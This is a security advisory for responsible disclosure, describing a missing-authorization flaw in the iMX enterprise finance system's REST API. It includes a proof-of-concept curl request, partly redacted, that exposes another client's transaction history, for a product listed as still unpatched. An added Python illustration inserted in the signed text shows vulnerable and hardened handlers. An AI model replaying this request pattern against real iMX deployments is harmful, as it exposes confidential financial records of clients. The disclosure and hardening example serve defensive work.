-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2026-011
Product:                   iMX
Manufacturer:              CODIX
Affected Version(s):       N.A.
Tested Version(s):         N.A.
Vulnerability Type:        Missing Authorization (CWE-862)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2026-02-27
Solution Date:             -
Public Disclosure:         2026-04-30
CVE Reference:             Not yet assigned
Author of Advisory:        Brian Ottmann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

iMX is an enterprise management system covering contracts, receivables,
financing, factoring, credit insurance, loans, leasing, collections,
legal disputes, and more.

The manufacturer describes the product as follows (see [1]):

"iMX is the result of many years of research and development at the
heart of the first European technopolis: Sophia Antipolis, on the
French Riviera, near Nice. iMX is an innovative solution which handles
- within its unique technical environment - 100% of the
industry-standard functions of various service businesses as well as
the particular requirements of each Client."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The application uses a REST API for its functionality and does not
perform any authorization check when a user without access to
transaction data requests that data via the API.

By requesting a specific resource, a user who knows the value of the
"decompte" parameter can view the corresponding client's transaction
history, even if the corresponding permission is not set in the back
end. As the value of the "decompte" parameter is used during regular
interaction with other functionality of the application, it cannot be
treated as a secret.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Log in with valid credentials as a user without the
   "ec_cf_fund_req_follow_up" permission and obtain a valid session.

2. Send an API request to
   /iMX/api/be/fundingTransactions/listFundingBundles?decompte=[...]&bankAccount=&requestDateFrom=&requestDateTo=&executionDateFrom=&executionDateTo=&status=&page=1&size=10&sort=requestDate,desc

===
curl https://[customer]/iMX/api/be/fundingTransactions/listFundingBundles?decompte=[...]&bankAccount=&requestDateFrom=&requestDateTo=&executionDateFrom=&executionDateTo=&status=&page=1&size=10&sort=requestDate,desc -H 'Cookie: JSESSIONID=23A643[...]_extranet; TS017643b5=01ba5b14022a9c[...]223a364cf183; user-language=de; TS011db4b4=01ba5b140[...]00223a364cf183; TS710d5612027=0853fd53ccab[...]0fc02d68dcdf496dfaccfea2112ff82dca2bb79d84f6' -k | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4288    0  4288    0     0   4653      0
{
  "content": [
    {
      "refer": "[...]",
      "requestDate": [...],
      "executionDate": null,
      "amount": 871268.49,
      "currency": "EUR",
      "bank": "[...]",
      "bankIndividu": "[...]",
      "iban": "ÜBERWEISUNG - [...],
      "status": "Genehmigt",
      "statusAbrev": "PM_ST_APP",
      "bundleGpiressort": "NO_BUNDLES",
      "totalCount": 2108,
      "pieceAmount": "[...]",
      "clientId": "[...]",
      "isExportAvailable": false,
      "bankUniqueId": "[...]"
(OUTPUT SHORTENED)
  "last": true,
  "first": true,
  "numberOfElements": 10,
  "size": 10,
  "number": 0
}
===

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

N.A.
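The following is an added illustration of the authorization gap described above; it is not code from this advisory, from SySS or from the CODIX iMX product. It models the listFundingBundles endpoint twice: once with only an authentication check (the CWE-862 behaviour the PoC exercises) and once with a function-level permission check plus an object-level check that the requested "decompte" belongs to the caller's own client. The permission string is the one named in the advisory; the session layout, the decompte-to-client mapping, the sample bundles and the status-code mapping are constructed assumptions.

```python
# Added illustration, not code from the advisory or from CODIX iMX.
# The permission name comes from the advisory; everything else below
# (session layout, decompte ownership, sample bundles) is constructed.
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import parse_qs

PERMISSION = "ec_cf_fund_req_follow_up"  # permission named in the advisory


@dataclass
class Session:
    user: str
    client_id: str                       # client the user belongs to (assumed)
    permissions: set = field(default_factory=set)


class Forbidden(Exception):
    pass


# Constructed sample data: which client a decompte belongs to, and its bundles.
DECOMPTE_OWNER = {"D-1001": "CLIENT-A", "D-2002": "CLIENT-B"}
FUNDING_BUNDLES = {
    "D-1001": [{"refer": "FB-1", "amount": 871268.49, "currency": "EUR"}],
    "D-2002": [{"refer": "FB-2", "amount": 1500.00, "currency": "EUR"}],
}


def decompte_from_query(query: str) -> Optional[str]:
    """Extract the decompte parameter from a query string shaped like the PoC's."""
    values = parse_qs(query, keep_blank_values=True).get("decompte", [])
    return values[0] if values and values[0] else None


def list_funding_bundles_vulnerable(session, decompte):
    """Authenticates only: any logged-in user who knows a decompte gets the data."""
    if session is None:
        raise Forbidden("not authenticated")
    return {"content": FUNDING_BUNDLES.get(decompte, [])}


def list_funding_bundles_hardened(session, decompte):
    """Function-level and object-level authorization before any data is read."""
    if session is None:
        raise Forbidden("not authenticated")
    # 1. Function-level: the caller needs the feature permission at all.
    if PERMISSION not in session.permissions:
        raise Forbidden("missing permission " + PERMISSION)
    # 2. Object-level: the decompte must belong to the caller's own client.
    #    Unknown and foreign decomptes get the same answer, so the response
    #    does not confirm which decompte values exist.
    owner = DECOMPTE_OWNER.get(decompte)
    if owner is None or owner != session.client_id:
        raise Forbidden("decompte not accessible")
    return {"content": FUNDING_BUNDLES[decompte]}


def handle(handler, session, query):
    """Minimal dispatch mapping handler outcomes to HTTP-style status codes."""
    decompte = decompte_from_query(query)
    if decompte is None:
        return 400, {"error": "decompte required"}
    try:
        return 200, handler(session, decompte)
    except Forbidden as exc:
        return 403, {"error": str(exc)}


if __name__ == "__main__":
    # The PoC situation: a user without the permission, belonging to another
    # client, requests client A's decompte.
    query = "decompte=D-1001&bankAccount=&page=1&size=10&sort=requestDate,desc"
    bob = Session("bob", "CLIENT-B")
    print("vulnerable:", handle(list_funding_bundles_vulnerable, bob, query))
    print("hardened:  ", handle(list_funding_bundles_hardened, bob, query))
```

The point of the two-step check is that neither step alone is enough: the permission check stops users who lack the feature entirely, and the ownership check stops users who hold the permission for their own client from reading another client's history by supplying a different, non-secret decompte value.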
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2026-02-26: Vulnerability discovered
2026-02-27: Vulnerability reported to manufacturer
2026-03-09: Contacted different contact person
2026-03-27: Contact retry
2026-04-30: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for iMX
    https://www.codix.eu/en/software/about-imx
[2] SySS Security Advisory SYSS-2026-011
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2026-011.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Brian Ottmann of SySS GmbH.

E-Mail: brian.ottmann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Brian_Ottmann.asc
PGP-Fingerprint: CBDF 14A4 83A9 4C31 5861 CF4F 78B4 D7D8 E8E6 65B1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEy98UpIOpTDFYYc9PeLTX2OjmZbEFAmny/Q4ACgkQeLTX2Ojm
ZbHrfA//YveOcQuEsZI5kjPHcMx7J3GpnMVa35z1lVWRVTqHdgj0+Chk9hb1GjJX
jTmEEpahg8zJrXLrrQvon/1HGeuTNEH8omzHUXrAYJ7uGA1R0QH9Ui858mpu7jJA
60zP3QvvR6W/7rHoIxLHsHcUSNX4iAs7HGAtJr1Q05e7medgtRZSLl2rapXV/hEW
XByi5C46S/hDZfVzOvUR+v1q00+G84m7xv69Q2M9TofuvUlF/LuByK8JyONEUreJ
F7nUYs+kiEQfSpPTbB3KJC7siobX6psPsfD/jT4NICJZc//Exn0BNbMlD2KEEHqs
9iY5bqlWH5a/HNXO8fe8a5BnWL603WJ6ArRaKlGRlLlwXSUO9p8TmdiquoiagIdG
mlgglJfcJdzrSsCwkVt1aEk35fnqD39Qj3T+hvw2W61jAk6SA2zqYOrjDOvxlMvu
wgSCz+5Shm8ozK8UGL1uwMraOxn9K7wUEOQJhs/4pKQgE+88DqA+QjZvdoWA0dNG
Z9cY5FQf7NKza5eONSl6p7pMIEyAJZLUy8RkkwHjzmluGQESG8t5N51rQRV98k0X
0osCURUOn48b8VH3L8nWqnHIvcKV62B47cmSED0gMWnPAcz7WthYEQu9k2fsLCGm
Yk0wRYUsg1fv3c7MJCCf8UEvjKHC/V1Rsutk/kuBZHE+CWosY/4=
=RQnY
-----END PGP SIGNATURE-----